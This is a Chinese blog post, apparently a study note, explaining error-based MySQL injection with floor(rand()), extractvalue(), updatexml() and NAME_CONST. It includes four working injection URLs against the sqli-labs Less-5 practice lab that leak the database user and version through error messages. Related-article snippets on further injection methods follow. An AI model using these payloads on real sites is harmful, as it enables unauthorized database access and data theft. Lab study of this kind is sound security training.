SQL报错注入

于 2024-04-16 06:30:00 发布
阅读量360 收藏 7
点赞数 4
分类专栏: MySql-injection 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61802503/article/details/137778806
版权

报错注入

报错注入的前提是页面上没有显示位,但必须有SQL语句执行错误的信息。攻击者可以通过输入单引号等方式来尝试触发错误,并利用如floor()、extractvalue()、updatexml()等函数来构造恶意的SQL语句,从而获取数据库的信息。

  1. 使用报错注入
  • 某些数据库配置可能不允许在 SELECT 语句的某些部分使用 RAND() 函数,或者可能在特定上下文中对其使用有限制。
  • floor(rand(0)*2) 被用在了查询的某个不允许使用这种数学表达式的地方(例如,在 GROUP BY 子句中),那么它可能会触发错误。
  • updatexml() 函数经常与 SQL 注入攻击相关,因为当 XPath 表达式格式不正确时,它会产生错误消息,这有时会被攻击者用来提取数据库的信息。
http://localhost/sqli-labs/Less-5/?id=1%27union%20select%201,count(*),concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand(0)*2))a%20from%20information_schema.columns%20group%20by%20a--+

在这里插入图片描述
2. xpath 函数报错注入

  • 通过闭合原始SQL查询,并插入恶意SQL代码(使用extractvalue函数触发错误并暴露数据库版本信息),尝试从数据库的错误信息中提取敏感信息。
http://localhost/sqli-labs/Less-5/?id=1%27and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))%20--+

在这里插入图片描述
3. xpath函数报错注入

  • 通过闭合原始SQL查询,并插入恶意SQL代码(使用updatexml函数触发错误并暴露数据库版本信息),尝试从数据库的错误信息中提取敏感信息。
http://localhost/sqli-labs/Less-5/?id=1%27and%20updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)%20--+

在这里插入图片描述
4. 利用数据的重复性

http://localhost/sqli-labs/Less-5/?id=1%27union%20select%201,2,3%20from%20(select%20NAME_CONST(version(),1),%20NAME_CONST(version(),1))x--+

在这里插入图片描述

CyberSecure
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
sql 报错注入
travelnight的博客
03-15 4067
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL 报错注入详解
2301_78008478的博客
05-08 891
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
网络安全——SQL报错注入
weixin_54055099的博客
09-14 1974
SQL注入之报错注入
SQL报错注入原理与实战利用讲解
chen_zhangkonzhe的博客
09-13 1450
MySQL有很多函数支持报错:updatexml() ,floor(), extractvalue() linestring() multipolygon() poolygon() multion()等。但是虽然采用了updatexml报错函数但是该函数只能显示32长度的内容,如果获取的内长度超过32则不会显示,然而这时候就需要使用字符串截取方法了,每次能够获取32个字符串的长度。首先需要获取当前数据库,通过数据库获取表名,接着通过表名获取字段,最后获取字段的数据内容。获取到表名就可以接着获取字段了。
sql报错注入原理
m0_54525483的博客
07-22 1590
0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的渗透测试报告中,出现最多的是xss(跨站脚本攻击)和明文传输等,但是对sql注入的利用方式,也相对成熟,详细了解sql注入,可以参考之前的文章。http://wt7315.blog.51cto.com/10319657/1828167 今天主要分享下sql注入中的报错型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。 ...
sql报错注入
Ran_799的博客
07-10 372
简单的sql报错注入笔记
12、SQL注入——SQL报错注入
qq_55202378的博客
12-05 451
通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号名、用户名等)通过页面的错误提示显示出来。
SQL注入之报错注入
2301_80661529的博客
02-22 1317
然而,当XPath表达式构造不当,例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串时,函数会抛出错误,并且错误信息可能包含有关查询的信息,这便为报错注入提供了机会。floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。这个表名可能不存在,服务器会抛出一个错误消息,可能揭示表是否存在的信息。
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2867
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
32-32.渗透测试SQL注入基于报错注入(上)
05-10
32-32.渗透测试SQL注入基于报错注入(上)
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上...
SQL手工注入完全篇
09-08
SQL手工注入是网络安全领域中的一个重要话题,主要涉及的是利用数据库查询语句的漏洞来非法获取或篡改数据库信息。在本完全篇中,我们将深入探讨SQL注入的基本原理、常见手法、防范措施以及如何进行安全编码。 一、...
33-33.渗透测试渗透测试之SQL注入基于报错注入(下)
最新发布
05-10
渗透测试渗透测试之SQL注入基于报错注入(下)
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入及延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
SQL注入.xmind
05-13
使用思维导图形式,总结分析了常见的SQL注入,盲注、报错注入、head注入等等,各个注入相关知识以及方式。
sql报错注入读取文件
05-22
报错注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些错误的语法或者参数,从而导致数据库执行错误,返回错误信息。 如果攻击者成功利用报错注入技术读取了数据库中的敏感信息,比如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CyberSecure

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值